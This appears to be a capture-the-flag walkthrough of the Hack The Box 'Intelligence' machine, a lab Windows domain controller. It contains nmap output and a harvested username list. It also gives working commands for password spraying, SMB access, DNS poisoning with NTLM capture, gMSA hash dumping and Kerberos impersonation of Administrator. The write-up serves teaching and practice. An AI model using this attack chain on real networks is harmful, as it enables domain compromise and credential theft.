In this post, I would like to share a walkthrough on Intelligence Machine.
This room has been considered difficulty rated as a Medium machine
Information Gathering on Intelligence Machine
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
# Nmap 7.91 scan initiated Sun Jul 4 09:05:50 2021 as: nmap -sC -sV -oA intial -Pn 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 20:19:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:28+00:00; +7h12m33s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:25+00:00; +7h12m32s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:28+00:00; +7h12m33s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:25+00:00; +7h12m32s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h12m32s, deviation: 0s, median: 7h12m31s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-04T20:19:46
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 4 09:07:55 2021 -- 1 IP address (1 host up) scanned in 125.33 seconds
From the result, we notice that the machine has configured Windows Active Directory LDAP.
** I’m so overly excited with this machine because i got to play with Active Directory **
We need to whitelist the domain name for the machine such as intelligence.htb
Let’s open the browser and straight into the website interface.
The website shows an “Intelligence” website that doesn’t contain any login page or link to access with
However, we managed to notice there were two download links after we scroll down the website.
Oh wow.. We managed to obtain the default password of something on the pdf file.
There’s some way to obtain several of the pdf files and download them into our machine. (Oh wait! I just notice that there are more than 40 pdf files stored on the machine.)
***You can get tools to enumerate on the pdf file but I’m doing it manually***
We need to verify the user of the pdf creator or those who upload it on the website itself. Sadly, there’s a bunch of names or usernames that we found such as shown below:
Administrator
Guest
krbtgt
Danny.Matthews
Jose.Williams
Jason.Wright
Samuel.Richardson
David.Mcbride
Scott.Scott
David.Reed
Ian.Duncan
Michelle.Kent
Jennifer.Thomas
Kaitlyn.Zimmerman
Travis.Evans
Kelly.Long
Nicole.Brock
Stephanie.Young
John.Coleman
Thomas.Valenzuela
Thomas.Hall
Brian.Baker
Richard.Williams
Teresa.Williamson
David.Wilson
Darryl.Harris
William.Lee
Thomas.Wise
Veronica.Patel
Joel.Crawford
Jean.Walter
Anita.Roberts
Brian.Morris
Daniel.Shelton
Jessica.Moody
Tiffany.Molina
James.Curbow
Jeremy.Mora
Jason.Patterson
Laura.Lee
Ted.Graves
We should save those names into a single file which i save as user.txt in my case.
Enumerate the machine with crackmapexec
We can easily determine which user can use the password that we found earlier by executing the command crackmapexec smb <ip> -u <filename> -p <password that we found earlier>
** You can download crackmapexec over here
After a while, i managed to determine that, Tiffany.Molina is the username that we can use for that password
Let’s access the smb “Users” shares via Tiffany.Molina’s credentials by running the command smbclient \\\\intelligence.htb\\Users – U Tiffany.Molina
We managed to find the user flag on the \Tiffany.Moline\Desktop\ directory
However, we cannot read the flag by normal type command but there are a few ways to read the user flag over here.
- Use “More” user.txt
- get user.txt (which the file will be downloaded on our machine)
We can read the user flag and slap it into HTB Submit Flag Column
Escalate to Root Privileges Access
We need to bind the DNS record to our machine by using dnstool such as shown above.
For those who don’t have the tools, you can download the dnstool over here
For us to get those ntlm hashes that are shown above, you need to run the command “sudo responsder -I tun0 -A“
We should copy-paste the NTLMv2 Hash onto a new file (any name should be fine). Once we have a password for Ted.Graves
We should be getting TED.Graves hashes by running the command python3 gMSADumper.py -u ‘Ted.Graves’ -p ‘Mr.Teddy’ -d ‘intelligence.htb’ -l ‘dc.intelligence.htb’
You need to update the time by executing the command sudo ntpdate <machine IP>
We should run the command from Impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes:d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator to get a ticker in Administrator.ccache
Therefore, we need to execute the export KRB5CCNAME=Administrator.ccache command to export the cache
We need to read the root flag by using impacket-atexec -k -no-pass dc.intelligence.htb ‘type C:\Users\Administrator\Desktop\root.txt’
In the screenshot above, i forgot to insert ‘ at the end of the command which I cannot read the root flag
I have re-try the command as above and it works!
-THE END-
Happy Learning Guys!
No responses yet